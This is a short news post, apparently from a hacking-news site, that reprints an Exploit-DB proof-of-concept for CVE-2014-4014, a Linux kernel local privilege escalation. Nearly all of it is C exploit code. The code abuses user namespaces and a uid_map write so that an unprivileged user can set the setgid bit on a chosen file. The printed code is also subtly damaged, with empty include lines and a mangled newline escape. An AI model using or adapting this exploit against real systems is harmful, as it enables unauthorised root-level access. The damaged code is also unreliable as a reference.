Linux Kernel Local Privilege Escalation PoC

  • 1
  •  
  •  
  •  
  •  
  •  
  •  
  •  
    1
    Share

Exploit-db have recently released a local privilege escalation POC as shown in the code example which affects the Linux 3.13 kernel and below.

Local attackers can exploit the issue to execute arbitrary code with elevated privileges or crash the system, effectively denying service to legitimate users.

/**
 * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
 *
 * Vitaly Nikolenko
 * http://hashcrack.org
 *
 * Usage: ./poc [file_path]
 * 
 * where file_path is the file on which you want to set the sgid bit
 */
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
 
struct args {
    int pipe_fd[2];
    char *file_path;
};
 
static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;
 
    // close stdout
    close(f_args->pipe_fd[1]); 
 
    assert(read(f_args->pipe_fd[0], &c, 1) == 0);
 
    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
 
    return 0;
}
 
int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;
 
    assert(argc == 2);
 
    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);
 
    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
    assert(pid != -1);
 
    // get the current uid outside the namespace
    snprintf(mapping, 1024, "0 %d 1n", getuid()); 
 
    // update uid and gid maps in the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);
 
    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
    close(f_args.pipe_fd[1]);
 
    assert (waitpid(pid, NULL, 0) != -1);
}
The following two tabs change content below.

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Leave a Reply